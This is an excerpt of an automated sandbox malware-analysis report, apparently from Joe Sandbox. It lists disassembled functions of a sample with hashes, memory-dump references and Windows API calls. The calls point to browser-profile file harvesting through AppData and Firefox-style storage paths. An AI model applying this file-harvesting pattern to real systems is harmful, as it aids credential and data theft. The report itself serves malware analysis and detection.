                            • Instruction ID: 6fe98b7d4a00e0394855df12e5412c5e2d1e9ebdd4aaa809935816e5bd68cf3d
                            • Opcode Fuzzy Hash: f9cf297853e441550b4dbe312ba3725aabccb8347359b56d768d41699a3b98d0
                            • Instruction Fuzzy Hash: 454138F7908308AFE304BE28EC5477AB7DADB94320F1A893DAAC5C7344F9355D058686
                            Function 011326F3 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ]6n
                            • API String ID: 0-1814913471
                            • Opcode ID: 1a26bd05e310c033c1503a29ff9f6598769bd7b0128bc3f8a32d1df79592049d
                            • Instruction ID: 9ad27e5f3e7f24e0d6cafc60010bf84ee37fdac012de1f6df1571e1d913b4628
                            • Opcode Fuzzy Hash: 1a26bd05e310c033c1503a29ff9f6598769bd7b0128bc3f8a32d1df79592049d
                            • Instruction Fuzzy Hash: 36314FB660C304AFD314EF69DC85A6AFBE9FB58350F12891DE6C4C3A14E73158408B97
                            Function 0124747B Relevance: .4, Instructions: 358COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb74248d6a81548f3dd9d457a07edf6ba16518b42cc6c9f35b0e4457a4d8b987
                            • Instruction ID: cf708517ac8ede3a95f82c892503c4be3fd5d4908edb4a41f35368aa4ca54c44
                            • Opcode Fuzzy Hash: bb74248d6a81548f3dd9d457a07edf6ba16518b42cc6c9f35b0e4457a4d8b987
                            • Instruction Fuzzy Hash: C8B18BF3A182009FE7145E2CECC576AB7D5EF94320F2A853DEB8497784EA365C058686
                            Function 0106627D Relevance: .2, Instructions: 217COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 54d15614cc8f04fe9bd88b0460b692d35ca5df11f9ffdf88c42110ad5731e54b
                            • Instruction ID: 92ba817fad18d56c23cd7d412b1011b1eef2b0344101bb4705a74b50a420ecb5
                            • Opcode Fuzzy Hash: 54d15614cc8f04fe9bd88b0460b692d35ca5df11f9ffdf88c42110ad5731e54b
                            • Instruction Fuzzy Hash: 6F6148F3E187145BE3146E2CDC89376BBD5EB94310F0A863DDA8497B88EC39180986C6
                            Function 010D0EEE Relevance: .2, Instructions: 204COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7cdcdae145e084573a21c5b3abcd6779c26ca95c147a8ddc3387ed94fc6d4827
                            • Instruction ID: 3827cf811b941d467defe87e13679bc1b80dc65098ba3f86a7864cc5adcbf429
                            • Opcode Fuzzy Hash: 7cdcdae145e084573a21c5b3abcd6779c26ca95c147a8ddc3387ed94fc6d4827
                            • Instruction Fuzzy Hash: 47513AF36086049BE308AE3DEC8577AB7D6EB94320F1A463EE685C77C4ED3558058296
                            Function 010A4EF7 Relevance: .2, Instructions: 192COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3fc0128f9abeb94817f3f6f4dae65cc4a6260236a175e96ae5f807e4d3b71405
                            • Instruction ID: 8e9deb71da0f42030be421a55b7236de62e9fb5105d26816a2b14677c0079c87
                            • Opcode Fuzzy Hash: 3fc0128f9abeb94817f3f6f4dae65cc4a6260236a175e96ae5f807e4d3b71405
                            • Instruction Fuzzy Hash: F251F6F3B082105FF304992CDC4576AB6DADBD4330F2B863DE988E7798E9795C064296
                            Function 011EE015 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 01ceead483924fbab3cb6dfc90b17daa406ac469bc55a0818bd8657bf741f1c3
                            • Instruction ID: 8b9e176a617f6e2168d577fe66e8c6050389331c01a169648bb10db8abd6c9f8
                            • Opcode Fuzzy Hash: 01ceead483924fbab3cb6dfc90b17daa406ac469bc55a0818bd8657bf741f1c3
                            • Instruction Fuzzy Hash: 8141BFB260DA00DFD70C6F69E84963EFBE4EB54720F17492EE6D283240E77158818B97
                            Function 00D785B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D78636
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7866D
                            • lstrcpy.KERNEL32(?,00000000), ref: 00D786AA
                            • StrStrA.SHLWAPI(?,00BFDE38), ref: 00D786CF
                            • lstrcpyn.KERNEL32(00F993D0,?,00000000), ref: 00D786EE
                            • lstrlen.KERNEL32(?), ref: 00D78701
                            • wsprintfA.USER32 ref: 00D78711
                            • lstrcpy.KERNEL32(?,?), ref: 00D78727
                            • StrStrA.SHLWAPI(?,00BFDEB0), ref: 00D78754
                            • lstrcpy.KERNEL32(?,00F993D0), ref: 00D787B4
                            • StrStrA.SHLWAPI(?,00BFDEF8), ref: 00D787E1
                            • lstrcpyn.KERNEL32(00F993D0,?,00000000), ref: 00D78800
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 147652bc4c6b3a420c62e723aa8346f717d900a46a4abd8d6b5e7962e506e87d
                            • Instruction ID: 1690dbb8c7e60a734eea3e0932048177e8dc4eca43f7d5b8a4b482d31dc55f72
                            • Opcode Fuzzy Hash: 147652bc4c6b3a420c62e723aa8346f717d900a46a4abd8d6b5e7962e506e87d
                            • Instruction Fuzzy Hash: 37F19E71905118AFDB10DFA8DC48EAAB7B9EF48340F15415AF909E3251EB70AE05EBB0
                            Function 00D61F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61F9F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D61FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00D61FE3
                            • lstrlen.KERNEL32(00D91794), ref: 00D61FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6200E
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D62042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6204D
                            • lstrlen.KERNEL32(00D91794), ref: 00D62058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62075
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D62081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D620AC
                            • lstrlen.KERNEL32(?), ref: 00D620E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62104
                            • lstrcat.KERNEL32(00000000,?), ref: 00D62112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62139
                            • lstrlen.KERNEL32(00D91794), ref: 00D6214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6216B
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D62177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D621A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D621D4
                            • lstrlen.KERNEL32(?), ref: 00D621EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6220A
                            • lstrcat.KERNEL32(00000000,?), ref: 00D62218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62242
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6227F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D6228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D622B1
                            • lstrcat.KERNEL32(00000000,00BFCD98), ref: 00D622B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D622F7
                            • lstrcat.KERNEL32(00000000), ref: 00D62304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D62356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D623BF
                            • DeleteFileA.KERNEL32(00000000), ref: 00D623F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D62444
                            • FindClose.KERNEL32(00000000), ref: 00D62453
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: c26b7ee55a5e53ce92ce6415304de18edfb7ee1079f4c1339991b250a7f20915
                            • Instruction ID: c66fdf029734210bdd51dcffd642cc18ddb9b129c77df5ae930d0a8e26db1ab6
                            • Opcode Fuzzy Hash: c26b7ee55a5e53ce92ce6415304de18edfb7ee1079f4c1339991b250a7f20915
                            • Instruction Fuzzy Hash: CCE13B31A51A1A9BCB21EFA4DD89ABE77B9EF44300F084029F905E7211DB74DD45CBB0
                            Function 00D76410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76445
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D76480
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D764AA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D764E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76506
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7650E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D76537
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: f6fe242879a0cb7046648b2440bdfdaa92d9363c2426cbf410391f95004f1499
                            • Instruction ID: c9bd22044f36a48fdfaf74f03b387ab5680ac39155405bafe3de6c2ac8a089b2
                            • Opcode Fuzzy Hash: f6fe242879a0cb7046648b2440bdfdaa92d9363c2426cbf410391f95004f1499
                            • Instruction Fuzzy Hash: C9F1BC70A11A0A9BCB21EF78D849AAE77B4EF44300F088169F819DB251FB74DD45CBB0
                            Function 00D74370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D743A3
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D743D6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D743FE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74409
                            • lstrlen.KERNEL32(\storage\default\), ref: 00D74414
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74431
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00D7443D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74466
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D74471
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74498
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D744D7
                            • lstrcat.KERNEL32(00000000,?), ref: 00D744DF
                            • lstrlen.KERNEL32(00D91794), ref: 00D744EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74507
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D74513
                            • lstrlen.KERNEL32(.metadata-v2), ref: 00D7451E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7453B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00D74547
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7456E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D745A0
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D745A7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74601
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7462A
